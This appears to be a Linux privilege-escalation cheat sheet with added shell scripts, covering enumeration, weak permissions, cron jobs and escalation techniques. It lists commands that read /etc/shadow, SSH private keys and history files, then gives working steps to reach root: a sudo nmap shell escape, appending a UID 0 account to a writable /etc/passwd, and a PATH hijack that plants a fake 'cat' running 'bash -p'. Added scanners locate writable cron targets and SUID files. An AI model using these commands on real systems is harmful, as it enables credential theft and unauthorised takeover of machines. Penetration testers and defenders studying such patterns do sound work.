Reusable escalation patterns¶
Shell¶
Upgrade a limited shell to an interactive TTY (use whichever Python interpreter is installed):
python -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
Host Information¶
Get OS version, patches, etc.:
/bin/uname -a
/usr/bin/lsb_release -a
/bin/cat /etc/*-release
User Information¶
Get current user:
/usr/bin/whoami
/usr/bin/id
Get user command history (bash, nano, vim, atftp, MySQL and the PHP interactive shell; a careful user often points .bash_history at /dev/null, so check the others):
/bin/cat /home/$(whoami)/.bash_history
/bin/cat /home/$(whoami)/.nano_history
/bin/cat /home/$(whoami)/.viminfo
/bin/cat /home/$(whoami)/.atftp_history
/bin/cat /home/$(whoami)/.mysql_history
/bin/cat /home/$(whoami)/.php_history
Get environment variables and PATH:
set
/bin/echo $PATH
Reset $PATH and environment variables:
set -a
source /etc/environment
. ~/
set +a
List users:
/bin/cat /etc/passwd
/bin/cat /etc/group
/bin/cat /etc/sudoers
Attempt to list hashed passwords:
/bin/cat /etc/shadow
Current logon and last logon:
/usr/bin/w
/usr/bin/last
SSH information (user keys and known hosts, daemon configuration, host keys; the private host keys are root-only unless their permissions are broken):
cat ~/.ssh/authorized_keys
cat ~/.ssh/known_hosts
cat ~/.ssh/identity.pub
cat ~/.ssh/identity
cat ~/.ssh/id_rsa.pub
cat ~/.ssh/id_rsa
cat ~/.ssh/id_dsa.pub
cat ~/.ssh/id_dsa
cat ~/.ssh/id_ecdsa
cat ~/.ssh/id_ed25519
cat /etc/ssh/ssh_config
cat /etc/ssh/sshd_config
cat /etc/ssh/ssh_host_dsa_key.pub
cat /etc/ssh/ssh_host_dsa_key
cat /etc/ssh/ssh_host_rsa_key.pub
cat /etc/ssh/ssh_host_rsa_key
cat /etc/ssh/ssh_host_key.pub
cat /etc/ssh/ssh_host_key
Services¶
Current processes and listening sockets (ss without options shows only established connections, so ask for listeners with PIDs):
/bin/ps -ef | /bin/grep root
/bin/ps -ef | /bin/grep $(whoami)
/bin/netstat -at
/bin/netstat -atnl
/bin/ss -tulpn
Tasks¶
List cron jobs and systemd timers:
/usr/bin/crontab -l
/bin/cat /etc/crontab
/bin/ls -alh /var/spool/cron
/bin/ls -al /etc/ | grep cron
/bin/ls -al /etc/cron*
/bin/cat /etc/cron*
/bin/cat /etc/at.allow
/bin/cat /etc/at.deny
/bin/cat /etc/cron.allow
/bin/cat /etc/cron.deny
systemctl list-timers --all
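The point of the cron listings is to spot a job whose command file the current user can edit: whatever you write into it runs as the job's user at the next scheduled time. The following is an added example, not code from the original page; it parses the system-crontab layout (minute hour dom mon dow user command) used by /etc/crontab and /etc/cron.d/*, resolves relative command names against the PATH cron itself will use, and reports writable targets. The crontab file and job names in the test are constructed; per-user crontabs under /var/spool/cron have no user column and are not handled.

```sh
#!/bin/sh
# Added example (not from the original page): find cron jobs whose command the
# current user can modify. Handles the system-crontab layout
# (minute hour dom mon dow user command) of /etc/crontab and /etc/cron.d/*.

# Print "user command" for each job line in crontab file $1, skipping comments,
# blank lines and variable assignments such as SHELL= PATH= MAILTO=.
cron_commands() {
    awk '
        /^[[:space:]]*(#|$)/                    { next }
        /^[[:space:]]*[A-Za-z_][A-Za-z0-9_]*=/   { next }
        $1 ~ /^@/ && NF >= 3                    { print $2, $3; next }  # @reboot user cmd
        NF >= 7                                 { print $6, $7 }        # m h dom mon dow user cmd
    ' "$1"
}

# PATH that cron will use for this crontab: its own PATH= line if present,
# otherwise the daemon default of /usr/bin:/bin.
cron_path() {
    p=$(sed -n 's/^[[:space:]]*PATH=//p' "$1" | tail -n 1 | tr -d '"')
    printf '%s\n' "${p:-/usr/bin:/bin}"
}

# For each job, resolve the command (relative names against cron's PATH, not the
# caller's) and report the ones the current user can write to.
writable_cron_targets() {
    cpath=$(cron_path "$1")
    cron_commands "$1" | while read -r user cmd; do
        case $cmd in
            /*) path=$cmd ;;
            *)  path=$(PATH=$cpath; command -v "$cmd" 2>/dev/null) || continue ;;
        esac
        if [ -f "$path" ] && [ -w "$path" ]; then
            printf '%s runs %s (writable)\n' "$user" "$path"
        fi
    done
}

# Usage: sh cronscan.sh --scan   (checks the system crontabs on this host)
if [ "${1:-}" = "--scan" ]; then
    for f in /etc/crontab /etc/cron.d/*; do
        [ -f "$f" ] && writable_cron_targets "$f"
    done
fi
```

A hit on a job running as root is a direct escalation; a hit on another user's job is a lateral step to that account. Scripts in /etc/cron.hourly and friends are not listed by the parser because run-parts executes them by directory, so check those with the ls commands above.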
Network¶
List network configuration, routes and firewall rules (iptables -L needs root):
/sbin/ifconfig -a
/sbin/iwconfig
/sbin/ip a
/sbin/ip route
/bin/cat /etc/network/interfaces
/bin/cat /etc/sysconfig/network
/bin/cat /etc/resolv.conf
/bin/cat /etc/networks
/sbin/iptables -L -n
/bin/hostname
/bin/dnsdomainname
Programs and Binaries¶
Search for installed programs or binaries:
/bin/ls -lha /bin
/bin/ls -lha /usr/bin
/bin/ls -lha /opt/
/bin/ls -lha /sbin/
/bin/ls -lha /var/cache/apt/archives/
/bin/ls -lha /var/cache/yum/*
dpkg -l
rpm -qa
Weak Permissions¶
World-writable files, files owned by the current user, and home directories:
/usr/bin/find / -type f -perm 0777 2>/dev/null
/usr/bin/find / -user $(whoami) 2>/dev/null
/bin/ls -ahlR /home/
/bin/ls -ahlR /root/
Files from a specific group:
find / -group <group> 2>/dev/null
Find SUID/SGID binaries and world-writable directories (modern GNU find: "/" means any of the listed bits, "-" means all of them; -maxdepth must come before the tests, and the parentheses keep -exec applying to both alternatives):
/usr/bin/find / -type f -perm /6000 2>/dev/null
/usr/bin/find / -type f -perm /4000 2>/dev/null
/usr/bin/find / -maxdepth 3 \( -perm -g=s -o -perm /4000 \) ! -type l -exec /bin/ls -ld {} \; 2>/dev/null
/usr/bin/find / -type d -perm -o+w ! -perm -1000 2>/dev/null
The same on older GNU find, which used "+" where newer versions use "/" (newer versions reject "+"):
/usr/bin/find / -type f -perm +6000 2>/dev/null
/usr/bin/find / -type f -perm +4000 2>/dev/null
/usr/bin/find / -maxdepth 3 \( -perm -g=s -o -perm +4000 \) ! -type l -exec /bin/ls -ld {} \; 2>/dev/null
/usr/bin/find / -type d -perm -o+w ! -perm -1000 2>/dev/null
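The two syntaxes above exist only because "any of these bits" (-perm /MODE) changed spelling; "all of these bits" (-perm -MODE) is POSIX and has never changed, so two -MODE tests joined by -o express the same search on every find. The following is an added example, not code from the original page: the sweep as functions that work on old and new find alike, plus a check the list does not include, which PATH directories the current user can write to. The directory names in the test are constructed.

```sh
#!/bin/sh
# Added example (not from the original page): the Weak Permissions searches as
# portable functions. Only POSIX "-perm -MODE" is used, so the code runs on both
# the "+" and "/" generations of GNU find. Drop -xdev to cross mount points.

# SUID or SGID regular files under $1 (equivalent of GNU "-perm /6000").
find_setid() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null
}

# World-writable files and directories under $1, skipping sticky directories such
# as /tmp, where anyone can create but only owners can delete or rename.
find_world_writable() {
    find "$1" -xdev \( -type f -o -type d \) -perm -0002 \
        ! \( -type d -perm -1000 \) 2>/dev/null
}

# Directories on a PATH string ($1, default the current PATH) that the current user
# can write to. Any hit lets a privileged process that resolves commands by bare
# name be hijacked with a file of the same name.
writable_path_dirs() {
    path=${1:-$PATH}
    old_ifs=$IFS
    IFS=:
    for d in $path; do
        if [ -d "$d" ] && [ -w "$d" ]; then
            printf '%s\n' "$d"
        fi
    done
    IFS=$old_ifs
}

# Usage: sh weakperms.sh --scan
if [ "${1:-}" = "--scan" ]; then
    echo "== SUID/SGID files"; find_setid /
    echo "== world-writable non-sticky paths"; find_world_writable /
    echo "== writable PATH directories"; writable_path_dirs
fi
```

Run as an ordinary user the scan is slow because of permission errors that 2>/dev/null hides; the result set is what matters, and every SUID hit should be checked against what the binary actually executes (the Elevations section below covers the relative-path case).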
Sudo Permissions¶
Attempt sudo:
/usr/bin/sudo su -
See if anything can run with sudo:
/usr/bin/sudo -l
Mail¶
Find mail files:
/bin/cat /var/mail/root
/bin/cat /var/mail/$(whoami)
/bin/cat /var/spool/mail/root
/bin/cat /var/spool/mail/$(whoami)
File System¶
Mounted drives:
/bin/df -lh
/bin/cat /etc/fstab
/bin/mount | column -t
Files¶
Search for potentially sensitive files:
/usr/bin/find / -type f -name "*.txt" 2> /dev/null
/usr/bin/find / -type f -name "*.log" 2> /dev/null
/usr/bin/find / -type f -name "*.sh" 2> /dev/null
/usr/bin/find / -type f -name "*.rar" 2> /dev/null
/usr/bin/find / -type f -name "*.zip" 2> /dev/null
/usr/bin/find / -type f -name "*.tar" 2> /dev/null
/usr/bin/find / -type f -name "*.gz" 2> /dev/null
/usr/bin/find / -type f -name "*.pdf" 2> /dev/null
/usr/bin/find / -type f -name "*.xls" 2> /dev/null
/usr/bin/find / -type f -name "*.xlsx" 2> /dev/null
/usr/bin/find / -type f -name "*.xml" 2> /dev/null
/usr/bin/find / -type f -name "*server.xml" 2> /dev/null
/usr/bin/find / -name "*name*" 2> /dev/null
/usr/bin/find / -type f -iname ".*" -ls 2> /dev/null
/usr/bin/find -maxdepth 2 -type f -ls -exec file -b {} \; 2> /dev/null
Elevations¶
If the user can run nmap with sudo (interactive mode exists only in nmap 2.02 through 5.21):
sudo nmap --interactive
Then escape:
!sh
On newer nmap, an NSE script gives the same result:
echo 'os.execute("/bin/sh")' > /tmp/shell.nse
sudo nmap --script=/tmp/shell.nse
If /etc/passwd is writable, generate an MD5-crypt hash:
openssl passwd -1 -salt <user> <password>
Then append a second UID 0 account using that hash and switch to it:
echo "<user>:<output>:0:0:root:/root:/bin/bash" >> /etc/passwd
su <user>
If a SUID binary calls another program by relative instead of absolute path (for example a binary backup that runs cat /etc/shadow), make your own cat:
echo '#!/bin/bash -p' > ~/cat
echo '/bin/bash -p' >> ~/cat
chmod +x ~/cat
Then put that directory first in PATH and run the binary:
export PATH=~/:$PATH
./backup
The -p matters: bash resets an effective UID that differs from the real UID unless it starts in privileged mode, so it belongs on the shebang as well as the final shell. If the binary launches cat through system(), the /bin/sh that system() uses must not be bash either, or privileges are dropped before your cat runs.
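The relative-path hijack works because the kernel resolves the interpreter in a shebang by absolute path but the program then looks up cat through PATH, which the caller controls. The following is an added example, not code from the original page: the pattern reproduced with a stand-in victim script instead of a SUID binary, so it runs as an unprivileged user and shows exactly which cat answered. All file names are constructed, and the fake cat only records what it was asked to read; in a real target the SUID bit is the one difference, and the payload would be the bash -p shell above.

```sh
#!/bin/sh
# Added example (not from the original page): the relative-path lookup behind the
# "backup runs cat" pattern, reproduced without a SUID bit so it runs as any user.
# All names are constructed; in a real target only the SUID bit differs.

# Stand-in for the vulnerable binary: calls "cat" by bare name, as a C program
# doing system("cat /etc/shadow") or execvp("cat", ...) would.
make_victim() {
    printf '#!/bin/sh\ncat "$1"\n' > "$1"
    chmod +x "$1"
}

# Fake "cat" in attacker-controlled directory $1. It records what it was asked to
# read in marker file $2; a real payload would exec "/bin/bash -p" here instead.
plant_fake_cat() {
    cat > "$1/cat" <<EOF
#!/bin/sh
echo "hijacked: \$*" > "$2"
EOF
    chmod +x "$1/cat"
}

# Lay out a lab under $1: victim, attacker directory, and a file standing in for
# /etc/shadow.
setup_lab() {
    mkdir -p "$1/evil"
    echo "real file contents" > "$1/secret.txt"
    make_victim "$1/backup"
    plant_fake_cat "$1/evil" "$1/marker"
}

# Run the victim with a sane PATH; the real cat prints the file.
run_clean() {
    PATH=/usr/bin:/bin "$1/backup" "$1/secret.txt"
}

# Run the victim with the attacker directory first in PATH (the page's
# "export PATH=~/:$PATH" step). Returns 0 when the planted cat was executed.
run_hijack() {
    rm -f "$1/marker"
    PATH="$1/evil:$PATH" "$1/backup" "$1/secret.txt" >/dev/null
    [ -f "$1/marker" ] && grep -q "^hijacked: $1/secret.txt$" "$1/marker"
}

# Usage: sh pathhijack.sh --demo
if [ "${1:-}" = "--demo" ]; then
    lab=$(mktemp -d)
    setup_lab "$lab"
    echo "clean run: $(run_clean "$lab")"
    if run_hijack "$lab"; then echo "hijacked run: $(cat "$lab/marker")"; fi
    rm -rf "$lab"
fi
```

The same lab shows the defence: change the victim to call /bin/cat, or have it set PATH to a fixed value before any lookup, and run_hijack fails no matter what PATH the caller supplies.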
Counter moves¶
These patterns chain small Linux misconfigurations into root. Least privilege and configuration auditing remove most of them at the source. The defender’s view is in the blue notes on the gap between access and authority.